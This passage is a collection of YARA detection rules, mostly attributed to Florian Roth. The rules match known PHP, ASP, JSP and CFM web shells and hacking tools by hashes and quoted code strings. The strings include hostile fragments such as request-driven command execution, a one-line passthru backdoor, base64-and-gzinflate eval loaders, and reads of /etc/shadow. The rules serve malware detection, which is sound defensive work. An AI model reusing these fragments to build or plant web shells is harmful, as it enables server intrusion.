   		1 of them   
rule webshell_wso2_5_1_wso2_5_wso2 {   
   	meta:   
   		description = "Web Shell - from files wso2.5.1.php, wso2.5.php, wso2.php"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		super_rule = 1   
   		hash0 = "dbeecd555a2ef80615f0894027ad75dc"   
   		hash1 = "7c8e5d31aad28eb1f0a9a53145551e05"   
   		hash2 = "cbc44fb78220958f81b739b493024688"   
   	strings:   
   		$s7 = "$opt_charsets .= '<option value=\"'.$item.'\" '.($_POST['charset']==$item?'selec"   
   		$s8 = ".'</td><td><a href=\"#\" onclick=\"g(\\'FilesTools\\',null,\\''.urlencode($f['na"   
   	condition:   
   		all of them   
rule w3d_php_php {   
   	meta:   
   		description = "Semi-Auto-generated  - file w3d.php.php.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		hash = "987f66b29bfb209a0b4f097f84f57c3b"   
   	strings:   
   		$s0 = "W3D Shell"   
   		$s1 = "By: Warpboy"   
   		$s2 = "No Query Executed"   
   	condition:   
   		2 of them   
rule rdrbs100 {   
   	meta:   
   		description = "Webshells Auto-generated - file rdrbs100.exe"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "7c752bcd6da796d80a6830c61a632bff"   
   	strings:   
   		$s3 = "Server address must be IP in A.B.C.D format."   
   		$s4 = " mapped ports in the list. Currently "   
   	condition:   
   		all of them   
rule webshell_r57shell127_r57_iFX_r57_kartal_r57_antichat {   
   	meta:   
   		description = "Web Shell - from files r57shell127.php, r57_iFX.php, r57_kartal.php, r57.php, antichat.php"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		super_rule = 1   
   		hash0 = "ae025c886fbe7f9ed159f49593674832"   
   		hash1 = "513b7be8bd0595c377283a7c87b44b2e"   
   		hash2 = "1d912c55b96e2efe8ca873d6040e3b30"   
   		hash3 = "4108f28a9792b50d95f95b9e5314fa1e"   
   		hash4 = "3f71175985848ee46cc13282fbed2269"   
   	strings:   
   		$s6 = "$res   = @mysql_query(\"SHOW CREATE TABLE `\".$_POST['mysql_tbl'].\"`\", $d"   
   		$s7 = "$sql1 .= $row[1].\"\\r\\n\\r\\n\";" fullword   
   		$s8 = "if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); }" fullword   
   		$s9 = "foreach($values as $k=>$v) {$values[$k] = addslashes($v);}" fullword   
   	condition:   
   		2 of them   
rule mysql_tool_php_php {   
   	meta:   
   		description = "Semi-Auto-generated  - file mysql_tool.php.php.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		hash = "5fbe4d8edeb2769eda5f4add9bab901e"   
   	strings:   
   		$s0 = "$error_text = '<strong>Failed selecting database \"'.$this->db['"   
   		$s1 = "$ra44  = rand(1,99999);$sj98 = \"sh-$ra44\";$ml = \"$sd98\";$a5 = $_SERV"   
   		$s4 = "<div align=\"center\">The backup process has now started<br "   
   	condition:   
   		1 of them   
rule SetupBDoor {   
   	meta:   
   		description = "Webshells Auto-generated - file SetupBDoor.exe"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "41f89e20398368e742eda4a3b45716b6"   
   	strings:   
   		$s1 = "\\BDoor\\SetupBDoor"   
   	condition:   
   		all of them   
rule webshell_itsec_PHPJackal_itsecteam_shell_jHn {   
   	meta:   
   		description = "Web Shell - from files itsec.php, PHPJackal.php, itsecteam_shell.php, jHn.php"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		super_rule = 1   
   		hash0 = "8ae9d2b50dc382f0571cd7492f079836"   
   		hash1 = "e2830d3286001d1455479849aacbbb38"   
   		hash2 = "bd6d3b2763c705a01cc2b3f105a25fa4"   
   		hash3 = "40c6ecf77253e805ace85f119fe1cebb"   
   	strings:   
   		$s0 = "$link=pg_connect(\"host=$host dbname=$db user=$user password=$pass\");" fullword   
   		$s6 = "while($data=ocifetchinto($stm,$data,OCI_ASSOC+OCI_RETURN_NULLS))$res.=implode('|"   
   		$s9 = "while($data=pg_fetch_row($result))$res.=implode('|-|-|-|-|-|',$data).'|+|+|+|+|+"   
   	condition:   
   		2 of them   
rule WebShell_Generic_PHP_1 {   
   	meta:   
   		description = "PHP Webshells Github Archive - from files Dive Shell 1.0 - Emperor Hacking Team.php, Dive_Shell_1.0_Emperor_Hacking_Team.php, SimShell 1.0 - Simorgh Security MGZ.php, SimShell_1.0_-_Simorgh_Security_MGZ.php"   
   		author = "Florian Roth"   
   		super_rule = 1   
   		hash0 = "3b086b9b53cf9d25ff0d30b1d41bb2f45c7cda2b"   
   		hash1 = "2558e728184b8efcdb57cfab918d95b06d45de04"   
   		hash2 = "203a8021192531d454efbc98a3bbb8cabe09c85c"   
   		hash3 = "b79709eb7801a28d02919c41cc75ac695884db27"   
   	strings:   
   		$s1 = "$token = substr($_REQUEST['command'], 0, $length);" fullword   
   		$s4 = "var command_hist = new Array(<?php echo $js_command_hist ?>);" fullword   
   		$s7 = "$_SESSION['output'] .= htmlspecialchars(fgets($io[1])," fullword   
   		$s9 = "document.shell.command.value = command_hist[current_line];" fullword   
   		$s16 = "$_REQUEST['command'] = $aliases[$token] . substr($_REQUEST['command'], $"   
   		$s19 = "if (empty($_SESSION['cwd']) || !empty($_REQUEST['reset'])) {" fullword   
   		$s20 = "if (e.keyCode == 38 && current_line < command_hist.length-1) {" fullword   
   	condition:   
   		5 of them   
rule webshell_asp_ntdaddy {   
   	meta:   
   		description = "Web Shell - file ntdaddy.asp"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		hash = "c5e6baa5d140f73b4e16a6cfde671c68"   
   	strings:   
   		$s9 =  "if  FP  =  \"RefreshFolder\"  or  "   
   		$s10 = "request.form(\"cmdOption\")=\"DeleteFolder\"  "   
   	condition:   
   		1 of them   
rule webshell_jsp_list {   
   	meta:   
   		description = "Web Shell - file list.jsp"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		hash = "1ea290ff4259dcaeb680cec992738eda"   
   	strings:   
   		$s0 = "<FORM METHOD=\"POST\" NAME=\"myform\" ACTION=\"\">" fullword   
   		$s2 = "out.print(\") <A Style='Color: \" + fcolor.toString() + \";' HRef='?file=\" + fn"   
   		$s7 = "if(flist[i].canRead() == true) out.print(\"r\" ); else out.print(\"-\");" fullword   
   	condition:   
   		all of them   
rule DTool_Pro_php {   
   	meta:   
   		description = "Semi-Auto-generated  - file DTool Pro.php.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		hash = "366ad973a3f327dfbfb915b0faaea5a6"   
   	strings:   
   		$s0 = "r3v3ng4ns\\nDigite"   
   		$s1 = "if(!@opendir($chdir)) $ch_msg=\"dtool: line 1: chdir: It seems that the permissi"   
   		$s3 = "if (empty($cmd) and $ch_msg==\"\") echo (\"Comandos Exclusivos do DTool Pro\\n"   
   	condition:   
   		1 of them   
rule webshell_jsp_123 {   
   	meta:   
   		description = "Web Shell - file 123.jsp"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		hash = "c691f53e849676cac68a38d692467641"   
   	strings:   
   		$s0 = "<font color=\"blue\">??????????????????:</font><input type=\"text\" size=\"7"   
   		$s3 = "String path=new String(request.getParameter(\"path\").getBytes(\"ISO-8859-1\""   
   		$s9 = "<input type=\"submit\" name=\"btnSubmit\" value=\"Upload\">    " fullword   
   	condition:   
   		all of them   
rule chinese_spam_spreader : webshell   
   {   
       meta:   
           author      = "Vlad https://github.com/vlad-s"   
           date        = "2016/07/18"   
           description = "Catches chinese PHP spam files (autospreaders)"   
       strings:   
           $a = "User-Agent: aQ0O010O"   
           $b = "<font color='red'><b>Connection Error!</b></font>"   
           $c = /if ?\(\$_POST\[Submit\]\) ?{/   
       condition:   
           all of them   
rule webshell_asp_cmd : webshell {   
   	meta:   
   		description = "Web Shell - file cmd.asp"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		hash = "895ca846858c315a3ff8daa7c55b3119"   
   	strings:   
   		$s0 = "<%= \"\\\\\" & oScriptNet.ComputerName & \"\\\" & oScriptNet.UserName %>" fullword   
   		$s1 = "Set oFileSys = Server.CreateObject(\"Scripting.FileSystemObject\")" fullword   
   		$s3 = "Call oScript.Run (\"cmd.exe /c \" & szCMD & \" > \" & szTempFile, 0, True)" fullword   
   	condition:   
   		1 of them   
rule shelltools_g0t_root_Fport {   
   	meta:   
   		description = "Webshells Auto-generated - file Fport.exe"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "dbb75488aa2fa22ba6950aead1ef30d5"   
   	strings:   
   		$s4 = "Copyright 2000 by Foundstone, Inc."   
   		$s5 = "You must have administrator privileges to run fport - exiting..."   
   	condition:   
   		all of them   
rule cyberlords_sql_php_php {   
   	meta:   
   		description = "Semi-Auto-generated  - file cyberlords_sql.php.php.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		hash = "03b06b4183cb9947ccda2c3d636406d4"   
   	strings:   
   		$s0 = "Coded by n0 [nZer0]"   
   		$s1 = " www.cyberlords.net"   
   		$s2 = "U29mdHdhcmUAQWRvYmUgSW1hZ2VSZWFkeXHJZTwAAAAMUExURf///wAAAJmZzAAAACJoURkAAAAE"   
   		$s3 = "return \"<BR>Dump error! Can't write to \".htmlspecialchars($file);"   
   	condition:   
   		1 of them   
rule WebShell__CrystalShell_v_1_erne_stres {   
   	meta:   
   		description = "PHP Webshells Github Archive - from files CrystalShell v.1.php, erne.php, stres.php"   
   		author = "Florian Roth"   
   		super_rule = 1   
   		hash0 = "335a0851304acedc3f117782b61479bbc0fd655a"   
   		hash1 = "6eb4ab630bd25bec577b39fb8a657350bf425687"   
   		hash2 = "03f88f494654f2ad0361fb63e805b6bbfc0c86de"   
   	strings:   
   		$s1 = "<input type='submit' value='  open (shill.txt) '>" fullword   
   		$s4 = "var_dump(curl_exec($ch));" fullword   
   		$s7 = "if(empty($_POST['Mohajer22'])){" fullword   
   		$s10 = "$m=$_POST['curl'];" fullword   
   		$s13 = "$u1p=$_POST['copy'];" fullword   
   		$s14 = "if(empty(\\$_POST['cmd'])){" fullword   
   		$s15 = "$string = explode(\"|\",$string);" fullword   
   		$s16 = "$stream = imap_open(\"/etc/passwd\", \"\", \"\");" fullword   
   	condition:   
   		5 of them   
rule klasvayv_asp {   
   	meta:   
   		description = "Semi-Auto-generated  - file klasvayv.asp.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		hash = "2b3e64bf8462fc3d008a3d1012da64ef"   
   	strings:   
   		$s1 = "set aktifklas=request.querystring(\"aktifklas\")"   
   		$s2 = "action=\"klasvayv.asp?klasorac=1&aktifklas=<%=aktifklas%>&klas=<%=aktifklas%>"   
   		$s3 = "<font color=\"#858585\">www.aventgrup.net"   
   		$s4 = "style=\"BACKGROUND-COLOR: #95B4CC; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT"   
   	condition:   
   		1 of them   
rule WebShell_SimAttacker___Vrsion_1_0_0___priv8_4_My_friend {   
   	meta:   
   		description = "PHP Webshells Github Archive - file SimAttacker - Vrsion 1.0.0 - priv8 4 My friend.php"   
   		author = "Florian Roth"   
   		hash = "6454cc5ab73143d72cf0025a81bd1fe710351b44"   
   	strings:   
   		$s4 = "&nbsp;Iranian Hackers : WWW.SIMORGH-EV.COM <br>" fullword   
   		$s5 = "//fake mail = Use victim server 4 DOS - fake mail " fullword   
   		$s10 = "<a style=\"TEXT-DECORATION: none\" href=\"http://www.simorgh-ev.com\">" fullword   
   		$s16 = "error_reporting(E_ERROR | E_WARNING | E_PARSE);" fullword   
   		$s17 = "echo \"<font size='1' color='#999999'>Dont in windows\";" fullword   
   		$s19 = "$Comments=$_POST['Comments'];" fullword   
   		$s20 = "Victim Mail :<br><input type='text' name='to' ><br>" fullword   
   	condition:   
   		3 of them   
rule multiple_webshells_0002 {   
   	meta:   
   		description = "Semi-Auto-generated  - from files nst.php.php.txt, img.php.php.txt, nstview.php.php.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		super_rule = 1   
   		was = "_nst_php_php_img_php_php_nstview_php_php"   
   		hash0 = "ddaf9f1986d17284de83a17fe5f9fd94"   
   		hash1 = "17a07bb84e137b8aa60f87cd6bfab748"   
   		hash2 = "4745d510fed4378e4b1730f56f25e569"   
   	strings:   
   		$s0 = "<tr><form method=post><td><font color=red><b>Back connect:</b></font></td><td><i"   
   		$s1 = "$perl_proxy_scp = \"IyEvdXNyL2Jpbi9wZXJsICANCiMhL3Vzci91c2MvcGVybC81LjAwNC9iaW4v"   
   		$s2 = "<tr><form method=post><td><font color=red><b>Backdoor:</b></font></td><td><input"   
   	condition:   
   		1 of them   
rule shellbot_pl {   
   	meta:   
   		description = "Semi-Auto-generated  - file shellbot.pl.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		hash = "b2a883bc3c03a35cfd020dd2ace4bab8"   
   	strings:   
   		$s0 = "ShellBOT"   
   		$s1 = "PacktsGr0up"   
   		$s2 = "CoRpOrAtIoN"   
   		$s3 = "# Servidor de irc que vai ser usado "   
   		$s4 = "/^ctcpflood\\s+(\\d+)\\s+(\\S+)"   
   	condition:   
   		2 of them   
rule EditServer_Webshell_2 {   
   	meta:   
   		description = "Webshells Auto-generated - file EditServer.exe"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "5c1f25a4d206c83cdfb006b3eb4c09ba"   
   	strings:   
   		$s0 = "@HOTMAIL.COM"   
   		$s1 = "Press Any Ke"   
   		$s3 = "glish MenuZ"   
   	condition:   
   		all of them   
rule Antichat_Shell_v1_3_php {   
   	meta:   
   		description = "Semi-Auto-generated  - file Antichat Shell v1.3.php.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		hash = "40d0abceba125868be7f3f990f031521"   
   	strings:   
   		$s0 = "Antichat"   
   		$s1 = "Can't open file, permission denide"   
   		$s2 = "$ra44"   
   	condition:   
   		2 of them   
rule elmaliseker_asp {   
   	meta:   
   		description = "Semi-Auto-generated  - file elmaliseker.asp.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		hash = "b32d1730d23a660fd6aa8e60c3dc549f"   
   	strings:   
   		$s0 = "if Int((1-0+1)*Rnd+0)=0 then makeEmail=makeText(8) & \"@\" & makeText(8) & \".\""   
   		$s1 = "<form name=frmCMD method=post action=\"<%=gURL%>\">"   
   		$s2 = "dim zombie_array,special_array"   
   		$s3 = "http://vnhacker.org"   
   	condition:   
   		1 of them   
rule WebShell_h4ntu_shell__powered_by_tsoi_ {   
   	meta:   
   		description = "PHP Webshells Github Archive - file h4ntu shell [powered by tsoi].php"   
   		author = "Florian Roth"   
   		hash = "cbca8cd000e705357e2a7e0cf8262678706f18f9"   
   	strings:   
   		$s11 = "<title>h4ntu shell [powered by tsoi]</title>" fullword   
   		$s13 = "$cmd = $_POST['cmd'];" fullword   
   		$s16 = "$uname = posix_uname( );" fullword   
   		$s17 = "if(!$whoami)$whoami=exec(\"whoami\");" fullword   
   		$s18 = "echo \"<p><font size=2 face=Verdana><b>This Is The Server Information</b></font>"   
   		$s20 = "ob_end_clean();" fullword   
   	condition:   
   		3 of them   
rule FSO_s_remview_2 {   
   	meta:   
   		description = "Webshells Auto-generated - file remview.php"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "b4a09911a5b23e00b55abe546ded691c"   
   	strings:   
   		$s0 = "<xmp>$out</"   
   		$s1 = ".mm(\"Eval PHP code\")."   
   	condition:   
   		all of them   
rule vanquish_2 {   
   	meta:   
   		description = "Webshells Auto-generated - file vanquish.exe"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "2dcb9055785a2ee01567f52b5a62b071"   
   	strings:   
   		$s2 = "Vanquish - DLL injection failed:"   
   	condition:   
   		all of them   
rule ironshell_php {   
   	meta:   
   		description = "Semi-Auto-generated  - file ironshell.php.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		hash = "8bfa2eeb8a3ff6afc619258e39fded56"   
   	strings:   
   		$s0 = "www.ironwarez.info"   
   		$s1 = "$cookiename = \"wieeeee\";"   
   		$s2 = "~ Shell I"   
   		$s3 = "www.rootshell-team.info"   
   		$s4 = "setcookie($cookiename, $_POST['pass'], time()+3600);"   
   	condition:   
   		1 of them   
rule webshell_zacosmall {   
   	meta:   
   		description = "Web Shell - file zacosmall.php"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		hash = "5295ee8dc2f5fd416be442548d68f7a6"   
   	strings:   
   		$s0 = "if($cmd!==''){ echo('<strong>'.htmlspecialchars($cmd).\"</strong><hr>"   
   	condition:   
   		all of them   
rule WebShell_accept_language {   
   	meta:   
   		description = "PHP Webshells Github Archive - file accept_language.php"   
   		author = "Florian Roth"   
   		hash = "180b13576f8a5407ab3325671b63750adbcb62c9"   
   	strings:   
   		$s0 = "<?php passthru(getenv(\"HTTP_ACCEPT_LANGUAGE\")); echo '<br> by q1w2e3r4'; ?>" fullword   
   	condition:   
   		all of them   
rule cfm_shell : webshell {   
   	meta:   
   		description = "Laudanum Injector Tools - file shell.cfm"   
   		author = "Florian Roth"   
   		reference = "http://laudanum.inguardians.com/"   
   		date = "2015-06-22"   
   		hash = "885e1783b07c73e7d47d3283be303c9719419b92"   
   	strings:   
   		$s1 = "Executable: <Input type=\"text\" name=\"cmd\" value=\"cmd.exe\"><br>" fullword ascii /* PEStudio Blacklist: strings */   
   		$s2 = "<cfif ( #suppliedCode# neq secretCode )>" fullword ascii /* PEStudio Blacklist: strings */   
   		$s3 = "<cfif IsDefined(\"form.cmd\")>" fullword ascii   
   	condition:   
   		filesize < 20KB and 2 of them   
rule vanquish {   
   	meta:   
   		description = "Webshells Auto-generated - file vanquish.dll"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "684450adde37a93e8bb362994efc898c"   
   	strings:   
   		$s3 = "You cannot delete protected files/folders! Instead, your attempt has been logged"   
   		$s8 = "?VCreateProcessA@@YGHPBDPADPAU_SECURITY_ATTRIBUTES@@2HKPAX0PAU_STARTUPINFOA@@PAU"   
   		$s9 = "?VFindFirstFileExW@@YGPAXPBGW4_FINDEX_INFO_LEVELS@@PAXW4_FINDEX_SEARCH_OPS@@2K@Z"   
   	condition:   
   		all of them   
rule webshell_webshells_new_aaa {   
   	meta:   
   		description = "Web shells - generated from file aaa.asp"   
   		author = "Florian Roth"   
   		date = "2014/03/28"   
   		score = 70   
   		hash = "68483788ab171a155db5266310c852b2"   
   	strings:   
   		$s0 = "Function fvm(jwv):If jwv=\"\"Then:fvm=jwv:Exit Function:End If:Dim tt,sru:tt=\""   
   		$s5 = "<option value=\"\"DROP TABLE [jnc];exec mast\"&kvp&\"er..xp_regwrite 'HKEY_LOCAL"   
   		$s17 = "if qpv=\"\" then qpv=\"x:\\Program Files\\MySQL\\MySQL Server 5.0\\my.ini\"&br&"   
   	condition:   
   		1 of them   
rule HYTop2006_rar_Folder_2006X2 {   
   	meta:   
   		description = "Webshells Auto-generated - file 2006X2.exe"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "cc5bf9fc56d404ebbc492855393d7620"   
   	strings:   
   		$s2 = "Powered By "   
   		$s3 = " \" onClick=\"this.form.sharp.name=this.form.password.value;this.form.action=this."   
   	condition:   
   		all of them   
rule regshell {   
   	meta:   
   		description = "Webshells Auto-generated - file regshell.exe"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "db2fdc821ca6091bab3ebd0d8bc46ded"   
   	strings:   
   		$s0 = "Changes the base hive to HKEY_CURRENT_USER."   
   		$s4 = "Displays a list of values and sub-keys in a registry Hive."   
   		$s5 = "Enter a menu selection number (1 - 3) or 99 to Exit: "   
   	condition:   
   		all of them   
rule multiple_webshells_0026 {   
   	meta:   
   		description = "Semi-Auto-generated  - from files Crystal.php.txt, nshell.php.php.txt, load_shell.php.php.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		super_rule = 1   
   		was = "_Crystal_php_nshell_php_php_load_shell_php_php"   
   		hash0 = "fdbf54d5bf3264eb1c4bff1fac548879"   
   		hash1 = "4a44d82da21438e32d4f514ab35c26b6"   
   		hash2 = "0c5d227f4aa76785e4760cdcff78a661"   
   	strings:   
   		$s0 = "if ($filename != \".\" and $filename != \"..\"){" fullword   
   		$s1 = "$dires = $dires . $directory;" fullword   
   		$s4 = "$arr = array_merge($arr, glob(\"*\"));" fullword   
   	condition:   
   		2 of them   
rule webshell_asp_dabao {   
   	meta:   
   		description = "Web Shell - file dabao.asp"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		hash = "3919b959e3fa7e86d52c2b0a91588d5d"   
   	strings:   
   		$s2 = " Echo \"<input type=button name=Submit onclick=\"\"document.location =&#039;\" &"   
   		$s8 = " Echo \"document.Frm_Pack.FileName.value=\"\"\"\"+year+\"\"-\"\"+(month+1)+\"\"-"   
   	condition:   
   		all of them   
rule sh_php_php {   
   	meta:   
   		description = "Semi-Auto-generated  - file sh.php.php.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		hash = "330af9337ae51d0bac175ba7076d6299"   
   	strings:   
   		$s1 = "$ar_file=array('/etc/passwd','/etc/shadow','/etc/master.passwd','/etc/fstab','/e"   
   		$s2 = "Show <input type=text size=5 value=\".((isset($_POST['br_st']))?$_POST['br_st']:"   
   	condition:   
   		1 of them   
rule sig_2005Gray {   
   	meta:   
   		description = "Webshells Auto-generated - file 2005Gray.asp"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "75dbe3d3b70a5678225d3e2d78b604cc"   
   	strings:   
   		$s0 = "SCROLLBAR-FACE-COLOR: #e8e7e7;"   
   		$s4 = "echo \"&nbsp;<a href=\"\"/\"&encodeForUrl(theHref,false)&\"\"\" target=_blank>\"&replace"   
   		$s8 = "theHref=mid(replace(lcase(list.path),lcase(server.mapPath(\"/\")),\"\"),2)"   
   		$s9 = "SCROLLBAR-3DLIGHT-COLOR: #cccccc;"   
   	condition:   
   		all of them   
rule bin_Client {   
   	meta:   
   		description = "Webshells Auto-generated - file Client.exe"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "5f91a5b46d155cacf0cc6673a2a5461b"   
   	strings:   
   		$s0 = "Recieved respond from server!!"   
   		$s4 = "packet door client"   
   		$s5 = "input source port(whatever you want):"   
   		$s7 = "Packet sent,waiting for reply..."   
   	condition:   
   		all of them   
rule adjustcr {   
   	meta:   
   		description = "Webshells Auto-generated - file adjustcr.exe"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "17037fa684ef4c90a25ec5674dac2eb6"   
   	strings:   
   		$s0 = "$Info: This file is packed with the UPX executable packer $"   
   		$s2 = "$License: NRV for UPX is distributed under special license $"   
   		$s6 = "AdjustCR Carr"   
   		$s7 = "ION\\System\\FloatingPo"   
   	condition:   
   		all of them   
rule ASP_CmdAsp {   
   	meta:   
   		description = "Webshells Auto-generated - file CmdAsp.asp"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "79d4f3425f7a89befb0ef3bafe5e332f"   
   	strings:   
   		$s2 = "' -- Read the output from our command and remove the temp file -- '"   
   		$s6 = "Call oScript.Run (\"cmd.exe /c \" & szCMD & \" > \" & szTempFile, 0, True)"   
   		$s9 = "' -- create the COM objects that we will be using -- '"   
   	condition:   
   		all of them   
rule webshell_php_backdoor {   
   	meta:   
   		description = "Web Shell - file php-backdoor.php"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		hash = "2b5cb105c4ea9b5ebc64705b4bd86bf7"   
   	strings:   
   		$s1 = "if(!move_uploaded_file($HTTP_POST_FILES['file_name']['tmp_name'], $dir.$fname))" fullword   
   		$s2 = "<pre><form action=\"<? echo $PHP_SELF; ?>\" METHOD=GET >execute command: <input "   
   	condition:   
   		all of them   
rule SimShell_1_0___Simorgh_Security_MGZ_php {   
   	meta:   
   		description = "Semi-Auto-generated  - file SimShell 1.0 - Simorgh Security MGZ.php.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		hash = "37cb1db26b1b0161a4bf678a6b4565bd"   
   	strings:   
   		$s0 = "Simorgh Security Magazine "   
   		$s1 = "Simshell.css"   
   		$s2 = "} elseif (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $_REQUEST['command'], "   
   		$s3 = "www.simorgh-ev.com"   
   	condition:   
   		2 of them   
rule WebShell_g00nshell_v1_3 {   
   	meta:   
   		description = "PHP Webshells Github Archive - file g00nshell-v1.3.php"   
   		author = "Florian Roth"   
   		hash = "70fe072e120249c9e2f0a8e9019f984aea84a504"   
   	strings:   
   		$s10 = "#To execute commands, simply include ?cmd=___ in the url. #" fullword   
   		$s15 = "$query = \"SHOW COLUMNS FROM \" . $_GET['table'];" fullword   
   		$s16 = "$uakey = \"724ea055b975621b9d679f7077257bd9\"; // MD5 encoded user-agent" fullword   
   		$s17 = "echo(\"<form method='GET' name='shell'>\");" fullword   
   		$s18 = "echo(\"<form method='post' action='?act=sql'>\");" fullword   
   	condition:   
   		2 of them   
rule Nshell__1__php_php {   
   	meta:   
   		description = "Semi-Auto-generated  - file Nshell (1).php.php.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		hash = "973fc89694097a41e684b43a21b1b099"   
   	strings:   
   		$s0 = "echo \"Command : <INPUT TYPE=text NAME=cmd value=\".@stripslashes(htmlentities($"   
   		$s1 = "if(!$whoami)$whoami=exec(\"whoami\"); echo \"whoami :\".$whoami.\"<br>\";" fullword   
   	condition:   
   		1 of them   
rule WebShell_php_webshells_529 {   
   	meta:   
   		description = "PHP Webshells Github Archive - file 529.php"   
   		author = "Florian Roth"   
   		hash = "ba3fb2995528307487dff7d5b624d9f4c94c75d3"   
   	strings:   
   		$s0 = "<p>More: <a href=\"/\">Md5Cracking.Com Crew</a> " fullword   
   		$s7 = "href=\"/\" title=\"Securityhouse\">Security House - Shell Center - Edited By Kin"   
   		$s9 = "echo '<PRE><P>This is exploit from <a " fullword   
   		$s10 = "This Exploit Was Edited By KingDefacer" fullword   
   		$s13 = "safe_mode and open_basedir Bypass PHP 5.2.9 " fullword   
   		$s14 = "$hardstyle = explode(\"/\", $file); " fullword   
   		$s20 = "while($level--) chdir(\"..\"); " fullword   
   	condition:   
   		2 of them   
rule webshell_browser_201_3_400_in_JFolder_jfolder01_jsp_leo_ma_warn_webshell_nc_download {   
   	meta:   
   		description = "Web Shell - from files browser.jsp, 201.jsp, 3.jsp, 400.jsp, in.jsp, JFolder.jsp, jfolder01.jsp, jsp.jsp, leo.jsp, ma.jsp, warn.jsp, webshell-nc.jsp, download.jsp"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		super_rule = 1   
   		hash0 = "37603e44ee6dc1c359feb68a0d566f76"   
   		hash1 = "a7e25b8ac605753ed0c438db93f6c498"   
   		hash2 = "fb8c6c3a69b93e5e7193036fd31a958d"   
   		hash3 = "36331f2c81bad763528d0ae00edf55be"   
   		hash4 = "793b3d0a740dbf355df3e6f68b8217a4"   
   		hash5 = "8979594423b68489024447474d113894"   
   		hash6 = "ec482fc969d182e5440521c913bab9bd"   
   		hash7 = "f98d2b33cd777e160d1489afed96de39"   
   		hash8 = "4b4c12b3002fad88ca6346a873855209"   
   		hash9 = "4cc68fa572e88b669bce606c7ace0ae9"   
   		hash10 = "e9a5280f77537e23da2545306f6a19ad"   
   		hash11 = "598eef7544935cf2139d1eada4375bb5"   
   		hash12 = "fa87bbd7201021c1aefee6fcc5b8e25a"   
   	strings:   
   		$s4 = "UplInfo info = UploadMonitor.getInfo(fi.clientFileName);" fullword   
   		$s5 = "long time = (System.currentTimeMillis() - starttime) / 1000l;" fullword   
   	condition:   
   		all of them   
rule WebShell_b374k_php {   
   	meta:   
   		description = "PHP Webshells Github Archive - file b374k.php.php"   
   		author = "Florian Roth"   
   		hash = "04c99efd187cf29dc4e5603c51be44170987bce2"   
   	strings:   
   		$s0 = "// encrypt your password to md5 here http://kerinci.net/?x=decode" fullword   
   		$s6 = "// password (default is: b374k)"   
   		$s8 = "//******************************************************************************"   
   		$s9 = "// b374k 2.2" fullword   
   		$s10 = "eval(\"?>\".gzinflate(base64_decode("   
   	condition:   
   		3 of them   
rule webshell_PHPJackal_v1_5 {   
   	meta:   
   		description = "Web Shell - file PHPJackal v1.5.php"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		hash = "d76dc20a4017191216a0315b7286056f"   
   	strings:   
   		$s7 = "echo \"<center>${t}MySQL cilent:</td><td bgcolor=\\\"#333333\\\"></td></tr><form"   
   		$s8 = "echo \"<center>${t}Wordlist generator:</td><td bgcolor=\\\"#333333\\\"></td></tr"   
   	condition:   
   		all of them   
rule webshell_phpspy_2005_full_phpspy_2005_lite_PHPSPY {   
   	meta:   
   		description = "Web Shell - from files phpspy_2005_full.php, phpspy_2005_lite.php, PHPSPY.php"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		super_rule = 1   
   		hash0 = "b68bfafc6059fd26732fa07fb6f7f640"   
   		hash1 = "42f211cec8032eb0881e87ebdb3d7224"   
   		hash2 = "0712e3dc262b4e1f98ed25760b206836"   
   	strings:   
   		$s6 = "<input type=\"text\" name=\"command\" size=\"60\" value=\"<?=$_POST['comma"   
